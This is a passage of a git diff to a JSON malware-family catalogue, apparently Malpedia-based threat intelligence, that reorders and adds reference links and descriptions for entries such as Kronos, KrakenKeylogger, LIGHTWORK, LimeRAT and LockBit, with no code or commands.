[ "Khalesi", @@ -30575,10 +32043,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.kraken", - "https://securingtomorrow.mcafee.com/mcafee-labs/fallout-exploit-kit-releases-the-kraken-ransomware-on-its-victims/", "https://web.archive.org/web/20160616170611/https://media.blackhat.com/bh-eu-10/presentations/Carrera_Silberman/BlackHat-EU-2010-Carrera-Silberman-State-of-Malware-slides.pdf", "https://www.bleepingcomputer.com/news/security/kraken-cryptor-ransomware-masquerading-as-superantispyware-security-program/", - "https://www.recordedfuture.com/kraken-cryptor-ransomware/" + "https://www.recordedfuture.com/kraken-cryptor-ransomware/", + "https://securingtomorrow.mcafee.com/mcafee-labs/fallout-exploit-kit-releases-the-kraken-ransomware-on-its-victims/" ], "synonyms": [], "type": [] @@ -30586,15 +32054,29 @@ "uuid": "3d7ae6b9-8161-470e-a7b6-752151b21657", "value": "Kraken" }, + { + "description": "KrakenKeylogger is a .NET based Infostealer malware sold in Underground hacking forums", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.krakenkeylogger", + "https://0xtoxin.github.io/threat%20hunting/KrakenKeylogger-pt2/", + "https://0xtoxin.github.io/malware%20analysis/KrakenKeylogger-pt1/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "6b15469a-64ff-4edc-99dd-60f7a277d5c1", + "value": "KrakenKeylogger" + }, { "description": "ThreatPost describes KRBanker (Blackmoon) as a banking Trojan designed to steal user credentials from various South Korean banking institutions. It was discovered in early 2014 and since then has adopted a variety of infection and credential stealing techniques.\r\n\r\n", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.krbanker", - "http://researchcenter.paloaltonetworks.com/2016/05/unit42-krbanker-targets-south-korea-through-adware-and-exploit-kits-2/", - "https://fidelissecurity.com/threatgeek/threat-intelligence/blackmoon-banking-trojan-new-framework/", - "https://zairon.wordpress.com/2014/04/15/trojan-banking-47d18761d46d8e7c4ad49cc575b0acc2bb3f49bb56a3d29fb1ec600447cb89a4/", "https://www.peppermalware.com/2019/03/analysis-of-blackmoon-banking-trojans.html", + "https://fidelissecurity.com/threatgeek/threat-intelligence/blackmoon-banking-trojan-new-framework/", + "http://researchcenter.paloaltonetworks.com/2016/05/unit42-krbanker-targets-south-korea-through-adware-and-exploit-kits-2/", + "https://zairon.wordpress.com/2014/04/15/trojan-banking-47d18761d46d8e7c4ad49cc575b0acc2bb3f49bb56a3d29fb1ec600447cb89a4/", "https://www.proofpoint.com/us/threat-insight/post/Updated-Blackmoon-Banking-Trojan" ], "synonyms": [ @@ -30618,30 +32100,30 @@ "value": "KrDownloader" }, { - "description": "", + "description": "Kronos malware is a sophisticated banking Trojan that first emerged in 2014. It is designed to target financial institutions and steal sensitive banking information. The malware is primarily spread through phishing campaigns and exploit kits. Once installed on a victim's computer, Kronos can capture login credentials, credit card details, and other personal information by keylogging and form grabbing techniques. It can also bypass security measures such as two-factor authentication. Kronos employs advanced evasion techniques to avoid detection by antivirus software and actively updates itself to evade security patches. It has been known to target a wide range of banking systems and has affected numerous organizations worldwide. The malware continues to evolve, making it a significant threat to online banking security.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.kronos", - "https://www.trendmicro.com/en_us/research/22/g/gootkit-loaders-updated-tactics-and-fileless-delivery-of-cobalt-strike.html", - "https://www.securonix.com/securonix-threat-research-kronos-osiris-banking-trojan-attack", - "https://dissectingmalwa.re/osiris-the-god-of-afterlifeand-banking-malware.html", - "https://intel471.com/blog/privateloader-malware", "https://research.checkpoint.com/deep-dive-upas-kit-vs-kronos/", - "https://www.proofpoint.com/us/threat-insight/post/kronos-banking-trojan-used-to-deliver-new-point-of-sale-malware", - "https://www.zdnet.com/article/security-researcher-malwaretech-pleads-guilty/", - "https://blog.malwarebytes.com/cybercrime/2017/08/inside-kronos-malware-p2/", - "https://blog.malwarebytes.com/threat-analysis/2016/10/new-looking-sundown-ek-drops-smoke-loader-kronos-banker/", - "https://unit42.paloaltonetworks.com/banking-trojan-techniques/", - "https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree", - "https://www.proofpoint.com/us/threat-insight/post/kronos-reborn", - "https://www.zscaler.com/blogs/security-research/ares-malware-grandson-kronos-banking-trojan", - "https://blog.malwarebytes.com/cybercrime/2017/08/inside-kronos-malware/", - "https://therecord.media/osiris-banking-trojan-shuts-down-as-new-ares-variant-emerges/", - "https://blog.trendmicro.com/trendlabs-security-intelligence/operation-black-atlas-endangers-in-store-card-payments-and-smbs-worldwide-switches-between-blackpos-and-other-tools/", - "https://vx-underground.org/archive/APTs/2017/2017.12.11/Money%20Taker.pdf", - "https://blog.morphisec.com/long-live-osiris-banking-trojan-targets-german-ip-addresses", + "https://www.securonix.com/securonix-threat-research-kronos-osiris-banking-trojan-attack", "https://twitter.com/3xp0rtblog/status/1294157781415743488", - "https://securityintelligence.com/the-father-of-zeus-kronos-malware-discovered/" + "https://dissectingmalwa.re/osiris-the-god-of-afterlifeand-banking-malware.html", + "https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree", + "https://blog.trendmicro.com/trendlabs-security-intelligence/operation-black-atlas-endangers-in-store-card-payments-and-smbs-worldwide-switches-between-blackpos-and-other-tools/", + "https://www.proofpoint.com/us/threat-insight/post/kronos-reborn", + "https://securityintelligence.com/the-father-of-zeus-kronos-malware-discovered/", + "https://www.proofpoint.com/us/threat-insight/post/kronos-banking-trojan-used-to-deliver-new-point-of-sale-malware", + "https://therecord.media/osiris-banking-trojan-shuts-down-as-new-ares-variant-emerges/", + "https://www.zscaler.com/blogs/security-research/ares-malware-grandson-kronos-banking-trojan", + "https://blog.morphisec.com/long-live-osiris-banking-trojan-targets-german-ip-addresses", + "https://blog.malwarebytes.com/cybercrime/2017/08/inside-kronos-malware/", + "https://intel471.com/blog/privateloader-malware", + "https://blog.malwarebytes.com/cybercrime/2017/08/inside-kronos-malware-p2/", + "https://www.zdnet.com/article/security-researcher-malwaretech-pleads-guilty/", + "https://blog.malwarebytes.com/threat-analysis/2016/10/new-looking-sundown-ek-drops-smoke-loader-kronos-banker/", + "https://vx-underground.org/archive/APTs/2017/2017.12.11/Money%20Taker.pdf", + "https://www.trendmicro.com/en_us/research/22/g/gootkit-loaders-updated-tactics-and-fileless-delivery-of-cobalt-strike.html", + "https://unit42.paloaltonetworks.com/banking-trojan-techniques/" ], "synonyms": [ "Osiris" @@ -30669,8 +32151,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ksl0t", - "https://0ffset.net/reverse-engineering/malware-analysis/analyzing-turlas-keylogger-1/", "https://0ffset.wordpress.com/2018/10/05/post-0x17-2-turla-keylogger/", + "https://0ffset.net/reverse-engineering/malware-analysis/analyzing-turlas-keylogger-1/", "https://0ffset.net/reverse-engineering/malware-analysis/analyzing-turlas-keylogger-2/" ], "synonyms": [], @@ -30738,17 +32220,17 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.kwampirs", + "https://www.zdnet.com/article/fbi-re-sends-alert-about-supply-chain-attacks-for-the-third-time-in-three-months/", "https://resources.cylera.com/new-evidence-linking-kwampirs-malware-to-shamoon-apts", - "https://blog.reversinglabs.com/blog/unpacking-kwampirs-rat", + "https://www.atlanticcouncil.org/wp-content/uploads/2020/07/Breaking-trust-Shades-of-crisis-across-an-insecure-software-supply-chain.pdf", + "https://www.securityartwork.es/2019/03/13/orangeworm-group-kwampirs-analysis-update/", "http://www.documentcloud.org/documents/6821581-FLASH-CP-000111-MW-Downgraded-Version.html", "https://resources.cylera.com/hubfs/Cylera%20Labs/Cylera%20Labs%20Kwampirs%20Shamoon%20Technical%20Report.pdf", - "https://thehackernews.com/2022/03/researchers-find-new-evidence-linking.html", - "https://www.securityartwork.es/2019/03/13/orangeworm-group-kwampirs-analysis-update/", - "https://www.atlanticcouncil.org/wp-content/uploads/2020/07/Breaking-trust-Shades-of-crisis-across-an-insecure-software-supply-chain.pdf", "https://www.symantec.com/blogs/threat-intelligence/orangeworm-targets-healthcare-us-europe-asia", + "https://www.zdnet.com/article/fbi-warns-about-ongoing-attacks-against-software-supply-chain-companies/", "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf", - "https://www.zdnet.com/article/fbi-re-sends-alert-about-supply-chain-attacks-for-the-third-time-in-three-months/", - "https://www.zdnet.com/article/fbi-warns-about-ongoing-attacks-against-software-supply-chain-companies/" + "https://blog.reversinglabs.com/blog/unpacking-kwampirs-rat", + "https://thehackernews.com/2022/03/researchers-find-new-evidence-linking.html" ], "synonyms": [], "type": [] @@ -30762,6 +32244,7 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ladon", "https://github.com/k8gege/Ladon", + "https://www.paloaltonetworks.com/blog/security-operations/through-the-cortex-xdr-lens-uncovering-a-new-activity-group-targeting-governments-in-the-middle-east-and-africa/", "https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023" ], "synonyms": [], @@ -30775,10 +32258,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.lalala_stealer", + "https://www.hornetsecurity.com/en/security-information/information-stealer-campaign-targeting-german-hr-contacts/", "https://blog.prevailion.com/2020/03/the-curious-case-of-criminal-curriculum.html", - "https://twitter.com/luc4m/status/1276477397102145538", "https://securitynews.sonicwall.com/xmlpost/lalala-infostealer-which-comes-with-batch-and-powershell-scripting-combo/", - "https://www.hornetsecurity.com/en/security-information/information-stealer-campaign-targeting-german-hr-contacts/" + "https://twitter.com/luc4m/status/1276477397102145538" ], "synonyms": [], "type": [] @@ -30791,12 +32274,12 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.lambert", - "https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=7ca2e331-2209-46a8-9e60-4cb83f9602de&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments", "https://ti.qianxin.com/blog/articles/network-weapons-of-cia/", - "https://twitter.com/_CPResearch_/status/1484502090068242433", - "https://www.symantec.com/connect/blogs/longhorn-tools-used-cyberespionage-group-linked-vault-7", - "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", "https://www.youtube.com/watch?v=jeLd-gw2bWo", + "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", + "https://www.symantec.com/connect/blogs/longhorn-tools-used-cyberespionage-group-linked-vault-7", + "https://twitter.com/_CPResearch_/status/1484502090068242433", + "https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=7ca2e331-2209-46a8-9e60-4cb83f9602de&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments", "https://securelist.com/blog/research/77990/unraveling-the-lamberts-toolkit/" ], "synonyms": [ @@ -30826,7 +32309,9 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.laplas", "https://twitter.com/Gi7w0rm/status/1604999633792647169", - "https://blog.cyble.com/2022/11/02/new-laplas-clipper-distributed-by-smokeloader/" + "https://embee-research.ghost.io/laplas-clipper-infrastructure/", + "https://blog.cyble.com/2022/11/02/new-laplas-clipper-distributed-by-smokeloader/", + "https://any.run/cybersecurity-blog/analyzing-laplasclipper-malware/" ], "synonyms": [], "type": [] @@ -30835,14 +32320,14 @@ "value": "LaplasClipper" }, { - "description": "FireEye describes this malware as a highly obfuscated bot that has been in the wild since mid-2013. It has managed to leave hardly any traces on the Internet, is capable of watching its victims without ever being noticed, and can even corrupt a hard disk, thus making a PC useless.\r\n\r\nUsing Dynamic Threat Intelligence, they have observed multiple campaigns targeting multiple industries in the United States, United Kingdom, South Korea, Brazil, United Arab Emirates, Singapore, Canada, Peru and Poland – primarily in the financial services and insurance sectors. Although the infection strategy is not new, the final payload dropped – which they named LATENTBOT – caught attention since it implements several layers of obfuscation, a unique exfiltration mechanism, and has been very successful at infecting multiple organizations.", + "description": "FireEye describes this malware as a highly obfuscated bot that has been in the wild since mid-2013. It has managed to leave hardly any traces on the Internet, is capable of watching its victims without ever being noticed, and can even corrupt a hard disk, thus making a PC useless.\r\n\r\nUsing Dynamic Threat Intelligence, they have observed multiple campaigns targeting multiple industries in the United States, United Kingdom, South Korea, Brazil, United Arab Emirates, Singapore, Canada, Peru and Poland \u2013 primarily in the financial services and insurance sectors. Although the infection strategy is not new, the final payload dropped \u2013 which they named LATENTBOT \u2013 caught attention since it implements several layers of obfuscation, a unique exfiltration mechanism, and has been very successful at infecting multiple organizations.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.latentbot", - "https://www.cert.pl/news/single/latentbot-modularny-i-silnie-zaciemniony-bot/", - "https://cys-centrum.com/ru/news/module_trojan_for_unauthorized_access", "https://www.fireeye.com/blog/threat-research/2015/12/latentbot_trace_me.html", + "https://www.cert.pl/news/single/latentbot-modularny-i-silnie-zaciemniony-bot/", "http://malware-traffic-analysis.net/2017/04/25/index.html", + "https://cys-centrum.com/ru/news/module_trojan_for_unauthorized_access", "https://blog.malwarebytes.com/threat-analysis/2017/06/latentbot/" ], "synonyms": [], @@ -30869,7 +32354,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.lazardoor", - "https://asec.ahnlab.com/ko/40495/" + "https://asec.ahnlab.com/ko/40495/", + "https://asec.ahnlab.com/ko/53832/" ], "synonyms": [], "type": [] @@ -30882,6 +32368,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.lazarloader", + "https://asec.ahnlab.com/ko/53832/", "https://securelist.com/bluenoroff-methods-bypass-motw/108383/" ], "synonyms": [], @@ -30895,8 +32382,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.lazarus_killdisk", - "https://blog.trendmicro.com/trendlabs-security-intelligence/new-killdisk-variant-hits-financial-organizations-in-latin-america/", - "https://www.welivesecurity.com/2018/04/03/lazarus-killdisk-central-american-casino/" + "https://www.welivesecurity.com/2018/04/03/lazarus-killdisk-central-american-casino/", + "https://www.virusbulletin.com/uploads/pdf/magazine/2018/VB2018-Kalnai-Poslusny.pdf", + "https://blog.trendmicro.com/trendlabs-security-intelligence/new-killdisk-variant-hits-financial-organizations-in-latin-america/" ], "synonyms": [ "KillDisk.NBO" @@ -30911,8 +32399,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.laziok", - "https://www.symantec.com/connect/blogs/new-reconnaissance-threat-trojanlaziok-targets-energy-sector", "https://www.gdatasoftware.com/blog/2015/05/24280-dissecting-the-kraken", + "https://www.symantec.com/connect/blogs/new-reconnaissance-threat-trojanlaziok-targets-energy-sector", "https://www.mysonicwall.com/sonicalert/searchresults.aspx?ev=article&id=802" ], "synonyms": [], @@ -30926,8 +32414,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.lazycat", - "https://www.microsoft.com/security/blog/2020/09/24/gadolinium-detecting-empires-cloud/", - "https://blog.yoroi.company/research/the-arsenal-behind-the-australian-parliament-hack/" + "https://blog.yoroi.company/research/the-arsenal-behind-the-australian-parliament-hack/", + "https://www.microsoft.com/security/blog/2020/09/24/gadolinium-detecting-empires-cloud/" ], "synonyms": [], "type": [] @@ -30940,10 +32428,12 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.lcpdot", - "https://research.nccgroup.com/2022/05/05/north-koreas-lazarus-and-their-initial-access-trade-craft-using-social-media-and-social-engineering/", + "https://global.ahnlab.com/global/upload/download/asecreport/ASEC%20REPORT_vol.102_ENG%20(4).pdf", "https://blogs.jpcert.or.jp/en/2021/01/Lazarus_malware2.html", "https://securelist.com/lazarus-trojanized-defi-app/106195/", - "https://global.ahnlab.com/global/upload/download/asecreport/ASEC%20REPORT_vol.102_ENG%20(4).pdf" + "https://research.nccgroup.com/2022/05/05/north-koreas-lazarus-and-their-initial-access-trade-craft-using-social-media-and-social-engineering/", + "https://cn.ahnlab.com/global/upload/download/asecreport/ASEC%20REPORT_vol.102_ENG%20(4).pdf", + "https://vblocalhost.com/uploads/VB2021-Park.pdf" ], "synonyms": [], "type": [] @@ -30996,19 +32486,19 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.lemonduck", "https://therecord.media/lemonduck-botnet-evolves-to-allow-hands-on-keyboard-intrusions/", + "https://success.trendmicro.com/solution/000261916", + "https://news.sophos.com/en-us/2021/05/07/new-lemon-duck-variants-exploiting-microsoft-exchange-server/?cmp=30728", "https://cybotsai.com/lemon-duck-attack/", "https://www.crowdstrike.com/blog/lemonduck-botnet-targets-docker-for-cryptomining-operations/", "https://www.trendmicro.com/en_us/research/21/e/proxylogon-a-coinminer--a-ransomware--and-a-botnet-join-the-part.html", - "https://news.sophos.com/en-us/2021/05/07/new-lemon-duck-variants-exploiting-microsoft-exchange-server/?cmp=30728", + "https://www.bitdefender.com/files/News/CaseStudies/study/373/Bitdefender-PR-Whitepaper-LemonDuck-creat4826-en-EN-GenericUse.pdf", + "https://notes.netbytesec.com/2021/06/lemon-duck-cryptominer-technical.html", + "https://www.microsoft.com/security/blog/2021/07/22/when-coin-miners-evolve-part-1-exposing-lemonduck-and-lemoncat-modern-mining-malware-infrastructure/", "https://www.microsoft.com/security/blog/2021/07/29/when-coin-miners-evolve-part-2-hunting-down-lemonduck-and-lemoncat-attacks/", "https://news.sophos.com/en-us/2019/10/01/lemon_duck-powershell-malware-cryptojacks-enterprise-networks/", - "https://asec.ahnlab.com/en/31811/", - "https://www.bleepingcomputer.com/news/security/vulnerable-microsoft-sql-servers-targeted-with-cobalt-strike/", "https://blog.talosintelligence.com/2021/05/lemon-duck-spreads-wings.html", - "https://notes.netbytesec.com/2021/06/lemon-duck-cryptominer-technical.html", - "https://www.bitdefender.com/files/News/CaseStudies/study/373/Bitdefender-PR-Whitepaper-LemonDuck-creat4826-en-EN-GenericUse.pdf", - "https://www.microsoft.com/security/blog/2021/07/22/when-coin-miners-evolve-part-1-exposing-lemonduck-and-lemoncat-modern-mining-malware-infrastructure/", - "https://success.trendmicro.com/solution/000261916" + "https://www.bleepingcomputer.com/news/security/vulnerable-microsoft-sql-servers-targeted-with-cobalt-strike/", + "https://asec.ahnlab.com/en/31811/" ], "synonyms": [], "type": [] @@ -31037,8 +32527,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.lethic", - "http://www.vkremez.com/2017/11/lets-learn-lethic-spambot-survey-of.html", "http://www.malware-traffic-analysis.net/2017/11/02/index.html", + "http://www.vkremez.com/2017/11/lets-learn-lethic-spambot-survey-of.html", "http://resources.infosecinstitute.com/win32lethic-botnet-analysis/" ], "synonyms": [], @@ -31078,10 +32568,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.liderc", - "https://go.recordedfuture.com/hubfs/reports/cta-2022-0330.pdf", "https://www.proofpoint.com/us/blog/threat-insight/i-knew-you-were-trouble-ta456-targets-defense-contractor-alluring-social-media", + "https://about.fb.com/news/2021/07/taking-action-against-hackers-in-iran/", "https://blog.talosintelligence.com/2019/09/tortoiseshell-fake-veterans.html", - "https://about.fb.com/news/2021/07/taking-action-against-hackers-in-iran/" + "https://go.recordedfuture.com/hubfs/reports/cta-2022-0330.pdf" ], "synonyms": [ "LEMPO" @@ -31109,14 +32599,14 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.lightneuron", - "https://www.secureworks.com/research/threat-profiles/iron-hunter", - "https://securelist.com/apt-trends-report-q2-2018/86487/", "https://www.welivesecurity.com/2019/05/07/turla-lightneuron-email-too-far/", + "https://www.welivesecurity.com/2020/03/12/tracking-turla-new-backdoor-armenian-watering-holes/", + "https://securelist.com/apt-trends-report-q2-2018/86487/", "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", "https://www.symantec.com/blogs/threat-intelligence/waterbug-espionage-governments", - "https://www.welivesecurity.com/2020/03/12/tracking-turla-new-backdoor-armenian-watering-holes/", - "https://www.welivesecurity.com/wp-content/uploads/2019/05/ESET-LightNeuron.pdf" + "https://www.welivesecurity.com/wp-content/uploads/2019/05/ESET-LightNeuron.pdf", + "https://www.secureworks.com/research/threat-profiles/iron-hunter" ], "synonyms": [ "NETTRANS", @@ -31128,7 +32618,7 @@ "value": "LightNeuron" }, { - "description": "Lightning stealer can target 30+ Firefox and Chromium-based browsers and steal crypto wallets, Telegram data, Discord tokens, and Steam user’s data. Unlike other info stealers, Lightning Stealer stores all the stolen data in the JSON format for exfiltration. ", + "description": "Lightning stealer can target 30+ Firefox and Chromium-based browsers and steal crypto wallets, Telegram data, Discord tokens, and Steam user\u2019s data. Unlike other info stealers, Lightning Stealer stores all the stolen data in the JSON format for exfiltration. ", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.lightning_stealer", @@ -31140,13 +32630,26 @@ "uuid": "48a21f7a-3dc9-4524-9628-10ed0f762bb4", "value": "Lightning Stealer" }, + { + "description": "According to Mandiant, LIGHTWORK is a disruption tool written in C++ that implements the IEC-104 protocol to modify the state of RTUs over TCP. It crafts configurable IEC-104 ASDU messages, to change the state of RTU IOAs to ON or OFF. This sample works in tandem with PIEHOP, which sets up the execution. ", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.lightwork", + "https://www.mandiant.com/resources/blog/cosmicenergy-ot-malware-russian-response" + ], + "synonyms": [], + "type": [] + }, + "uuid": "01cbe4cc-43ba-4bc8-9fee-9daf63dda335", + "value": "LIGHTWORK" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ligsterac", - "http://atm.cybercrime-tracker.net/index.php", - "https://securelist.com/atm-infector/74772/" + "https://securelist.com/atm-infector/74772/", + "http://atm.cybercrime-tracker.net/index.php" ], "synonyms": [], "type": [] @@ -31159,16 +32662,16 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.lilith", - "https://blog.trendmicro.com/trendlabs-security-intelligence/operation-endtrade-finding-multi-stage-backdoors-that-tick/", - "https://yoroi.company/research/a-deep-dive-into-eternity-group-a-new-emerging-cyber-threat/", - "https://github.com/werkamsus/Lilith", - "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/591/original/062521_SideCopy_%281%29.pdf", - "https://www.trendmicro.com/en_us/research/21/l/collecting-in-the-dark-tropic-trooper-targets-transportation-and-government-organizations.html", "https://www.zscaler.com/blogs/security-research/analysis-lilithbot-malware-and-eternity-threat-group", "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/591/original/062521_SideCopy_%281%29.pdf?1625657388", "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/592/original/Hashes_IOCs_for_coverage.txt", + "https://blog.trendmicro.com/trendlabs-security-intelligence/operation-endtrade-finding-multi-stage-backdoors-that-tick/", + "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/594/original/Network_IOCs_list_for_coverage.txt?1625657479", + "https://www.trendmicro.com/en_us/research/21/l/collecting-in-the-dark-tropic-trooper-targets-transportation-and-government-organizations.html", + "https://yoroi.company/research/a-deep-dive-into-eternity-group-a-new-emerging-cyber-threat/", "https://blog.cyble.com/2022/07/12/new-ransomware-groups-on-the-rise/", - "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/594/original/Network_IOCs_list_for_coverage.txt?1625657479" + "https://github.com/werkamsus/Lilith", + "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/591/original/062521_SideCopy_%281%29.pdf" ], "synonyms": [], "type": [] @@ -31220,23 +32723,23 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.limerat", + "https://github.com/NYAN-x-CAT/Lime-RAT/", + "https://blog.morphisec.com/tracking-hcrypt-an-active-crypter-as-a-service", + "https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord", + "https://www.youtube.com/watch?v=x-g-ZLeX8GM", "https://blog.talosintelligence.com/2022/04/asyncrat-3losh-update.html", + "https://ics-cert.kaspersky.com/media/Kaspersky-ICS-CERT-APT-attacks-on-industrial-organizations-in-H1-2021-En.pdf", + "https://www.trendmicro.com/en_us/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-ameri.html", + "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/targeted-attack-on-government-agencies.html", "https://blog.reversinglabs.com/blog/rats-in-the-library", + "https://www.trendmicro.com/en_us/research/21/i/Water-Basilisk-Uses-New-HCrypt-Variant-to-Flood-Victims-with-RAT-Payloads.html", + "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-american-entities-with-commodity-rats/BlindEagleIOCList.txt", + "https://felipetarijon.github.io/2022-12-12-limerat-infecting-unskilled-threat-actors/", "https://any.run/cybersecurity-blog/limerat-malware-analysis/", "https://lab52.io/blog/apt-c-36-recent-activity-analysis/", - "https://blog.morphisec.com/tracking-hcrypt-an-active-crypter-as-a-service", - "https://www.youtube.com/watch?v=x-g-ZLeX8GM", - "https://github.com/NYAN-x-CAT/Lime-RAT/", - "https://blogs.juniper.net/en-us/threat-research/new-pastebin-like-service-used-in-multiple-malware-campaigns", - "https://ics-cert.kaspersky.com/media/Kaspersky-ICS-CERT-APT-attacks-on-industrial-organizations-in-H1-2021-En.pdf", "https://lab52.io/blog/literature-lover-targeting-colombia-with-limerat/", - "https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord", - "https://blog.yoroi.company/research/limerat-spreads-in-the-wild/", - "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-american-entities-with-commodity-rats/BlindEagleIOCList.txt", - "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/targeted-attack-on-government-agencies.html", - "https://www.trendmicro.com/en_us/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-ameri.html", - "https://www.trendmicro.com/en_us/research/21/i/Water-Basilisk-Uses-New-HCrypt-Variant-to-Flood-Victims-with-RAT-Payloads.html", - "https://felipetarijon.github.io/2022-12-12-limerat-infecting-unskilled-threat-actors/" + "https://blogs.juniper.net/en-us/threat-research/new-pastebin-like-service-used-in-multiple-malware-campaigns", + "https://blog.yoroi.company/research/limerat-spreads-in-the-wild/" ], "synonyms": [], "type": [] @@ -31288,8 +32791,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.liteduke", - "https://norfolkinfosec.com/looking-back-at-liteduke/", - "https://www.carbonblack.com/2020/03/26/the-dukes-of-moscow/" + "https://www.carbonblack.com/2020/03/26/the-dukes-of-moscow/", + "https://norfolkinfosec.com/looking-back-at-liteduke/" ], "synonyms": [], "type": [] @@ -31302,9 +32805,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.litehttp", - "https://malware.news/t/recent-litehttp-activities-and-iocs/21053", "https://github.com/zettabithf/LiteHTTP", - "https://viriback.com/recent-litehttp-activities-and-iocs/" + "https://viriback.com/recent-litehttp-activities-and-iocs/", + "https://malware.news/t/recent-litehttp-activities-and-iocs/21053" ], "synonyms": [], "type": [] @@ -31317,7 +32820,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.lobshot", - "https://www.elastic.co/de/security-labs/elastic-security-labs-discovers-lobshot-malware" + "https://www.elastic.co/de/security-labs/elastic-security-labs-discovers-lobshot-malware", + "https://research.openanalysis.net/lobshot/bot/hvnc/triage/2023/07/16/lobshot.html" ], "synonyms": [], "type": [] @@ -31330,134 +32834,141 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.lockbit", - "https://www.intrinsec.com/alphv-ransomware-gang-analysis", - "https://asec.ahnlab.com/en/35822/", - "https://chuongdong.com/reverse%20engineering/2022/03/19/LockbitRansomware/", - "https://www.trendmicro.com/en_no/research/22/d/Thwarting-Loaders-From-SocGholish-to-BLISTERs-LockBit-Payload.html", - "https://securityscorecard.com/research/the-increase-in-ransomware-attacks-on-local-governments", - "https://id-ransomware.blogspot.com/search?q=lockbit", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lockbit-targets-servers", - "https://asec.ahnlab.com/en/41450/", - "https://www.bleepingcomputer.com/news/security/ransomware-attack-hits-italys-lazio-region-affects-covid-19-site/", - "https://www.cybereason.com/blog/rising-threat-from-lockbit-ransomware", - "https://blog.minerva-labs.com/lockbit-3.0-aka-lockbit-black-is-here-with-a-new-icon-new-ransom-note-new-wallpaper-but-less-evasiveness", - "https://www.sentinelone.com/labs/lockbit-3-0-update-unpicking-the-ransomwares-latest-anti-analysis-and-evasion-techniques/", - "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", - "https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023", - "https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/", - "https://www.coveware.com/blog/2022/1/26/ransomware-as-a-service-innovation-curve", - "https://umbrella.cisco.com/blog/cybersecurity-threat-spotlight-blackmatter-lockbit-thor", - "https://twitter.com/MsftSecIntel/status/1522690116979855360", - 